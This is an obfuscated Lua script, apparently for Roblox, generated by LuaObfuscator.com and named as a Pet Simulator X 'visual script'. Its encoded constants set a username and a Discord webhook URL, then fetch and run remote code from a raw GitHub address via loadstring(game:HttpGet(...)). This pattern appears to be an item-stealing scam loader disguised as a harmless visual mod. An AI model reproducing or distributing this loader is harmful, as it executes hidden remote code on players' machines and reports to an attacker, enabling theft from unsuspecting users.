--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.6) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v71=(v31/((5 -3)^(v32-(2 -1))))%((1 + 1)^(((v33-((1 + 0) -0)) -(v32-(2 -1))) + 1)) ;return v71-(v71%(878 -(282 + 595))) ;else local v72=(621 -(555 + 64))^(v32-(932 -(857 + 74))) ;return (((v31%(v72 + v72))>=v72) and ((2206 -(1523 + 114)) -(367 + 201))) or (927 -(214 + 713)) ;end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34=0 + 0 ;local v35;local v36;local v37;local v38;while true do if ((0 -0)==v34) then v35,v36,v37,v38=v1(v16,v19,v19 + (1068 -(68 + 997)) );v19=v19 + ((2231 -(892 + 65)) -(226 + 1044)) ;v34=(9 -5) -(5 -2) ;end if (v34==(118 -(32 + 85))) then return (v38 * 16777216) + (v37 * (64226 + 1310)) + (v36 * (57 + 199)) + v35 ;end end end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v39=0 + 0 ;local v40;local v41;local v42;local v43;local v44;local v45;local v46;local v47;while true do if (4==v39) then while true do if (v40==2) then local v94=166 -(9 + 157) ;local v95;while true do if (v94==(0 -0)) then v95=0;while true do if (v95~=(1824 -(1195 + 629))) then else local v108=0;while true do if (v108==(0 -0)) then v45=nil;v46=nil;v108=1;end if (v108==(242 -(187 + 54))) then v95=781 -(162 + 618) ;break;end end end if (1==v95) then v40=3;break;end end break;end end end if (v40==0) then local v96=0 + 0 ;local v97;while true do if (v96~=0) then else v97=0 + 0 ;while true do if (v97~=(0 -0)) then else local v109=0 -0 ;while true do if (v109==0) then v41=0;v42=nil;v109=1 + 0 ;end if (v109==(1637 -(1373 + 263))) then v97=1;break;end end end if (v97==1) then v40=1001 -(451 + 549) ;break;end end break;end end end if (v40~=3) then else v47=nil;while true do local v103=0;while true do if (v103~=(0 + 0)) then else if (v41~=(2 -0)) then else local v110=0;local v111;while true do if (v110~=0) then else v111=0 -0 ;while true do if (v111~=0) then else local v118=0;while true do if ((1384 -(746 + 638))~=v118) then else for v154=1,v24() do local v155=0;local v156;local v157;while true do if (v155==(0 + 0)) then v156=0 -0 ;v157=nil;v155=1;end if (v155==1) then while true do if (v156~=0) then else v157=v22();if (v21(v157,342 -(218 + 123) ,1)~=(1581 -(1535 + 46))) then else local v174=0;local v175;local v176;local v177;local v178;local v179;while true do if (v174~=(2 + 0)) then else v179=nil;while true do if (v175~=(1 + 0)) then else local v189=560 -(306 + 254) ;while true do if (v189~=(1 + 0)) then else v175=2;break;end if ((0 -0)==v189) then v178=nil;v179=nil;v189=1;end end end if (v175~=(1467 -(899 + 568))) then else local v190=0;while true do if (1==v190) then v175=1;break;end if (v190==(0 + 0)) then v176=0;v177=nil;v190=1;end end end if (v175==2) then while true do if (v176==3) then if (v21(v178,7 -4 ,3)==1) then v179[4]=v47[v179[4]];end v42[v154]=v179;break;end if (v176~=(604 -(268 + 335))) then else local v192=0;local v193;while true do if ((290 -(60 + 230))~=v192) then else v193=572 -(426 + 146) ;while true do if ((1 + 0)==v193) then v176=1458 -(282 + 1174) ;break;end if (v193==0) then local v202=811 -(569 + 242) ;while true do if (v202~=(0 -0)) then else v179={v23(),v23(),nil,nil};if (v177==0) then local v207=0 -0 ;local v208;local v209;local v210;while true do if (0==v207) then v208=0 + 0 ;v209=nil;v207=1;end if (v207~=1) then else v210=nil;while true do if (v208~=(701 -(271 + 429))) then else while true do if (0~=v209) then else v210=0;while true do if (v210~=(0 + 0)) then else v179[3]=v23();v179[1504 -(1408 + 92) ]=v23();break;end end break;end end break;end if (v208==(1086 -(461 + 625))) then local v214=0;while true do if (v214==(1289 -(993 + 295))) then v208=1;break;end if (v214==0) then v209=0;v210=nil;v214=1 + 0 ;end end end end break;end end elseif (v177==(1172 -(418 + 753))) then v179[3]=v24();elseif (v177==(1 + 1)) then v179[3]=v24() -(2^(2 + 14)) ;elseif (v177==3) then local v215=0;while true do if ((0 + 0)==v215) then v179[3]=v24() -((1 + 1)^(545 -(406 + 123))) ;v179[4]=v23();break;end end end v202=1;end if ((1770 -(1749 + 20))==v202) then v193=1 + 0 ;break;end end end end break;end end end if (v176~=2) then else local v194=0;local v195;local v196;while true do if (v194~=(1323 -(1249 + 73))) then else while true do if (v195~=(0 + 0)) then else v196=0;while true do if (v196~=(1146 -(466 + 679))) then else v176=3;break;end if (v196~=(0 -0)) then else local v203=0 -0 ;local v204;while true do if (v203==(1900 -(106 + 1794))) then v204=0;while true do if (v204~=0) then else local v213=0;while true do if (v213==0) then if (v21(v178,1 + 0 ,1 + 0 )==(2 -1)) then v179[2]=v47[v179[2]];end if (v21(v178,2,5 -3 )==1) then v179[117 -(4 + 110) ]=v47[v179[3]];end v213=1;end if (v213==1) then v204=1;break;end end end if (v204~=(585 -(57 + 527))) then else v196=1428 -(41 + 1386) ;break;end end break;end end end end break;end end break;end if (v194~=0) then else v195=0;v196=nil;v194=1;end end end if (v176==0) then local v197=0;local v198;local v199;while true do if (v197~=0) then else v198=0;v199=nil;v197=104 -(17 + 86) ;end if (v197~=(1 + 0)) then else while true do if (v198==0) then v199=0 -0 ;while true do if ((2 -1)~=v199) then else v176=167 -(122 + 44) ;break;end if (v199==0) then local v205=0 -0 ;local v206;while true do if ((0 -0)==v205) then v206=0;while true do if (v206~=1) then else v199=1 + 0 ;break;end if (v206~=(0 + 0)) then else v177=v21(v157,3 -1 ,68 -(30 + 35) );v178=v21(v157,4,5 + 1 );v206=1;end end break;end end end end break;end end break;end end end end break;end end break;end if (v174~=1) then else local v184=0;while true do if (v184~=0) then else v177=nil;v178=nil;v184=1258 -(1043 + 214) ;end if (v184==1) then v174=7 -5 ;break;end end end if (v174==0) then local v185=0;while true do if ((1212 -(323 + 889))~=v185) then else v175=0 -0 ;v176=nil;v185=581 -(361 + 219) ;end if (v185==1) then v174=1;break;end end end end end break;end end break;end end end for v158=1,v24() do v43[v158-(321 -(53 + 267)) ]=v29();end v118=1 + 0 ;end if (v118~=(414 -(15 + 398))) then else v111=1;break;end end end if (1~=v111) then else local v119=0;while true do if (v119~=(982 -(18 + 964))) then else for v160=3 -2 ,v24() do v44[v160]=v24();end return v45;end end end end break;end end end if (v41~=1) then else local v112=0 + 0 ;while true do if (1==v112) then local v117=0;while true do if (0~=v117) then else for v143=1,v46 do local v144=0 + 0 ;local v145;local v146;local v147;local v148;local v149;while true do if (v144~=(851 -(20 + 830))) then else v147=nil;v148=nil;v144=2 + 0 ;end if (v144~=2) then else v149=nil;while true do if (v145==(127 -(116 + 10))) then v148=nil;v149=nil;v145=1 + 1 ;end if ((738 -(542 + 196))~=v145) then else local v168=0 -0 ;while true do if (v168==1) then v145=1;break;end if ((0 + 0)~=v168) then else v146=0 + 0 ;v147=nil;v168=1 + 0 ;end end end if (v145~=2) then else while true do if (v146~=1) then else v149=nil;while true do if (v147~=(0 -0)) then else local v180=0;while true do if (v180==1) then v147=2 -1 ;break;end if (v180~=0) then else local v188=1551 -(1126 + 425) ;while true do if (v188~=0) then else v148=v22();v149=nil;v188=1;end if (v188~=(406 -(118 + 287))) then else v180=3 -2 ;break;end end end end end if (v147==1) then if (v148==(1122 -(118 + 1003))) then v149=v22()~=0 ;elseif (v148==(5 -3)) then v149=v25();elseif (v148==(380 -(142 + 235))) then v149=v26();end v47[v143]=v149;break;end end break;end if (v146~=0) then else v147=0;v148=nil;v146=4 -3 ;end end break;end end break;end if ((0 + 0)==v144) then v145=0;v146=nil;v144=1;end end end v45[980 -(553 + 424) ]=v22();v117=1 -0 ;end if (v117~=1) then else v112=2 + 0 ;break;end end end if ((0 + 0)==v112) then v46=v24();v47={};v112=1;end if (v112==(2 + 0)) then v41=1 + 1 ;break;end end end v103=1 + 0 ;end if (v103==(2 -1)) then if (v41~=(0 -0)) then else local v113=0 -0 ;local v114;while true do if (v113~=(0 + 0)) then else v114=0 -0 ;while true do if (v114==(754 -(239 + 514))) then local v121=0 + 0 ;local v122;while true do if (v121~=(1329 -(797 + 532))) then else v122=0;while true do if (v122==(0 + 0)) then v44={};v45={v42,v43,nil,v44};v122=1;end if (v122~=1) then else v114=1204 -(373 + 829) ;break;end end break;end end end if (v114~=2) then else v41=1;break;end if (v114~=(731 -(476 + 255))) then else local v123=1130 -(369 + 761) ;while true do if (v123==1) then v114=1 + 0 ;break;end if (v123~=0) then else local v150=0 -0 ;while true do if ((1 -0)~=v150) then else v123=1;break;end if (v150~=0) then else v42={};v43={};v150=1;end end end end end end break;end end end break;end end end break;end if (v40==1) then local v98=0;while true do if (v98==0) then v43=nil;v44=nil;v98=239 -(64 + 174) ;end if ((1 + 0)~=v98) then else v40=2 -0 ;break;end end end end break;end if (v39~=1) then else v42=nil;v43=nil;v39=338 -(144 + 192) ;end if (v39~=(218 -(42 + 174))) then else v44=nil;v45=nil;v39=3 + 0 ;end if (v39~=(0 + 0)) then else v40=0 + 0 ;v41=nil;v39=1;end if (v39~=(1507 -(363 + 1141))) then else v46=nil;v47=nil;v39=1584 -(1183 + 397) ;end end end v30=nil;v18=7;end if (v18==4) then function v25()local v48=v24();local v49=v24();local v50=2 -1 ;local v51=(v21(v49,1,(1153 -(782 + 356)) + 5 ) * ((2 + 0)^(2007 -(1913 + 62)))) + v48 ;local v52=v21(v49,(281 -(176 + 91)) + 7 ,81 -(130 -80) );local v53=((v21(v49,1965 -((832 -267) + 1368) )==(3 -2)) and  -((3275 -(1565 + 48)) -(1477 + 184))) or (1 -0) ;if (v52==(0 + 0)) then if (v51==(856 -(564 + 292))) then return v53 * (0 -0) ;else local v77=0;while true do if (v77==(0 -0)) then v52=305 -(244 + 60) ;v50=1092 -(975 + 117) ;break;end end end elseif (v52==(1574 + 473)) then return ((v51==(476 -(41 + 435))) and (v53 * ((1002 -(938 + 63))/(0 + 0)))) or (v53 * NaN) ;end return v8(v53,v52-(2148 -(936 + 117 + 72)) ) * (v50 + (v51/((1 + 1)^52))) ;end v26=nil;function v26(v54)local v55;if  not v54 then v54=v24();if (v54==(1875 -(157 + 1718))) then return "";end end v55=v3(v16,v19,(v19 + v54) -1 );v19=v19 + v54 ;local v56={};for v69=1 + 0 , #v55 do v56[v69]=v2(v1(v3(v55,v69,v69)));end return v6(v56);end v18=5;end if (v18==2) then function v22()local v57=v1(v16,v19,v19);v19=v19 + 1 ;return v57;end v23=nil;function v23()local v58=(611 -(602 + 9)) -0 ;local v59;local v60;while true do if (v58==(0 -0)) then v59,v60=v1(v16,v19,v19 + (1020 -(697 + 321)) );v19=v19 + (3 -1) ;v58=2 -1 ;end if (v58==1) then return (v60 * (1483 -(322 + 905))) + v59 ;end end end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v61)if (v1(v61,2)==79) then v20=v0(v3(v61,1,1));return "";else local v73=v2(v0(v61,16));if v20 then local v78=v5(v73,v20);v20=nil;return v78;else return v73;end end end);v18=1;end if (v18==7) then function v30(v62,v63,v64)local v65=0;local v66;local v67;local v68;while true do if (v65==0) then v66=v62[1];v67=v62[2];v65=1;end if (v65==1) then v68=v62[3];return function(...)local v79=1;local v80= -1;local v81={...};local v82=v12("#",...) -1 ;local function v83()local v84=v66;local v85=v67;local v86=v68;local v87=v28;local v88={};local v89={};local v90={};for v99=1189 -((715 -(28 + 238)) + 740) ,v82 do if ((v99>=v86) or ((3026 -(826 + 46))>=3325)) then v88[v99-v86 ]=v81[v99 + (948 -(245 + 702)) ];else v90[v99]=v81[v99 + (3 -2) ];end end local v91=(v82-v86) + 1 + 0 ;local v92;local v93;while true do local v100=1898 -(260 + 1638) ;local v101;while true do if ((v100==(0 -0)) or ((1735 -(382 + 58))>=(10371 -7138))) then v101=0 + 0 ;while true do if ((4377>1642) and (v101==0)) then v92=v84[v79];v93=v92[1 -(1559 -(1381 + 178)) ];v101=1;end if (((14039 -(8738 + 578))>(2561 -(902 + 303))) and (v101==(1 -0))) then if ((v93<=(6 -3)) or ((356 + 3780)<=3433)) then if (((5935 -(1121 + 569))<=(4845 -(18 + 4 + 192))) and (v93<=(684 -(483 + 86 + 114)))) then if ((4276>=(5377 -(1404 + 59))) and (v93>(0 -(0 -0)))) then local v124=0;local v125;local v126;local v127;local v128;while true do if ((((138 + 127) -67)<=(5130 -(468 + 297))) and (v124==(563 -(334 + 228)))) then local v151=0 -0 ;while true do if (((11083 -6301)>4676) and (v151==(1 -0))) then v124=1 + 1 ;break;end if (((5100 -(141 + 95))>(2159 + 38)) and (v151==(0 -0))) then v80=(v127 + v125) -(2 -1) ;v128=0 + 0 ;v151=2 -1 ;end end end if (((2 + 0)==v124) or (((2397 -(381 + 89)) + 1573 + 200)==2507)) then for v162=v125,v80 do local v163=0;local v164;local v165;while true do if (((6299 -1825)>=(162 + 112)) and (v163==(163 -(92 + 71)))) then v164=0 + 0 ;v165=nil;v163=1;end if ((v163==(1 -0)) or ((2659 -(574 + 191))<=(1160 + 246))) then while true do if (((3938 -2366)>=(783 + 748)) and (((575 + 274) -(254 + 595))==v164)) then v165=(215 -89) -(55 + 71) ;while true do if ((v165==0) or ((6174 -1487)<((7488 -(1074 + 82)) -(573 + 1217)))) then v128=v128 + ((3 -1) -1) ;v90[v162]=v126[v128];break;end end break;end end break;end end end break;end if (((251 + 3040)>(2685 -1018)) and (v124==(939 -(714 + 225)))) then v125=v92[5 -3 ];v126,v127=v87(v90[v125](v13(v90,v125 + (1 -(1784 -(214 + 1570))) ,v92[1 + 2 ])));v124=1 -0 ;end end else v90[v92[808 -(118 + 688) ]]();end elseif ((v93==(50 -((1480 -(990 + 465)) + 23))) or (873==(394 + 1640))) then local v129=1886 -(927 + 959) ;local v130;local v131;local v132;local v133;while true do if ((v129==(6 -4)) or ((3548 -(16 + 716))<11)) then while true do if ((3699<(9084 -4378)) and (0==v130)) then v131=97 -(11 + 86) ;v132=nil;v130=2 -1 ;end if (((2931 -(175 + 110))>=(2211 -1335)) and (v130==(4 -3))) then v133=nil;while true do if (((2410 -(503 + 1293))<=((3666 + 5226) -5708)) and (v131==(1 + 0))) then v90[v132 + (1062 -(810 + 251)) ]=v133;v90[v132]=v133[v92[4]];break;end if (((2170 + 956)==(418 + 542 + 2107 + 59)) and ((0 + (0 -0))==v131)) then local v172=533 -(43 + 490) ;local v173;while true do if ((v172==0) or ((2920 -(711 + 22))>=(19162 -(15934 -(1668 + 58))))) then v173=(1485 -(512 + 114)) -(240 + 619) ;while true do if ((v173==(1 + 0)) or ((6166 -2289)==(237 + 3338))) then v131=1745 -(1344 + 400) ;break;end if (((1112 -((664 -409) + 150))>((1029 -531) + 134)) and ((0 + 0)==v173)) then v132=v92[8 -6 ];v133=v90[v92[9 -6 ]];v173=1740 -(404 + 1335) ;end end break;end end end end break;end end break;end if ((v129==(407 -(183 + 223))) or (546>=((11361 -8096) -581))) then v132=nil;v133=nil;v129=2 + 0 + 0 ;end if (((528 + 937)<=(4638 -(10 + 327))) and (v129==0)) then v130=0 + 0 ;v131=nil;v129=339 -(118 + 42 + 178) ;end end else local v134=0 + 0 ;local v135;local v136;while true do if (((568 + 1136)>1425) and (1==v134)) then while true do if ((v135==(449 -(108 + (1150 -809)))) or ((309 + 378)==(17900 -13666))) then v136=v92[2];v90[v136]=v90[v136](v13(v90,v136 + 1 ,v80));break;end end break;end if ((v134==(1493 -((2705 -(109 + 1885)) + 782))) or ((6383 -3053)<1429)) then local v153=0;while true do if (((1616 -((1739 -(1269 + 200)) + 199))>=(109 + (433 -207))) and (1==v153)) then v134=1820 -(580 + 1239) ;break;end if (((10211 -6776)>(2006 + 91)) and (v153==0)) then v135=0 + 0 ;v136=nil;v153=1 + 0 ;end end end end end elseif ((v93<=5) or ((9843 -(6888 -(98 + 717)))>=4041)) then if ((v93>(3 + 1)) or ((4958 -(645 + 522))<=1611)) then v90[v92[1792 -(1010 + 780) ]]=v92[3];else v90[v92[2 + 0 ]]=v64[v92[14 -11 ]];end elseif ((v93==((843 -(802 + 24)) -11)) or ((6414 -(1045 + (1363 -572)))<=(5082 -3074))) then do return;end else v90[v92[2 -0 ]][v92[508 -(351 + 154) ]]=v92[4];end v79=v79 + (1575 -(1281 + 293)) ;break;end end break;end end end end A,B=v28(v11(v83));if  not A[1] then local v102=v62[4][v79] or "?" ;error("Script error at ["   .. v102   .. "]:"   .. A[2] );else return v13(A,2,B);end end;end end end return v30(v29(),{},v17)(...);end end end v15("LOL!0B3O0003023O005F4703083O00557365726E616D65030A3O0048696472614C6172636803073O004875624E616D65030F3O0050737856697375616C536372697074030A3O00576562682O6F6B55726C03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O31302O362O33362O3237312O3234323334372F645762795A6F713O572D4D322D6F586B50342D2O75396D34597A363078696C3058536E3430744C4D7A6D793748626B4256584F46445A6536436F30563854502D366E32030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4A61792O696F6365616E2O692F5065616B4F6E546F702F6D61696E2F7065616B2E6C7561000E3O0012043O00013O0030073O000200030012043O00013O0030073O000400050012043O00013O0030073O000600070012043O00083O001204000100093O00200200010001000A0012050003000B4O0001000100034O00035O00026O000100012O00063O00017O000E3O00023O00023O00033O00033O00043O00043O00053O00053O00053O00053O00053O00053O00053O00063O00",v9(),...);end
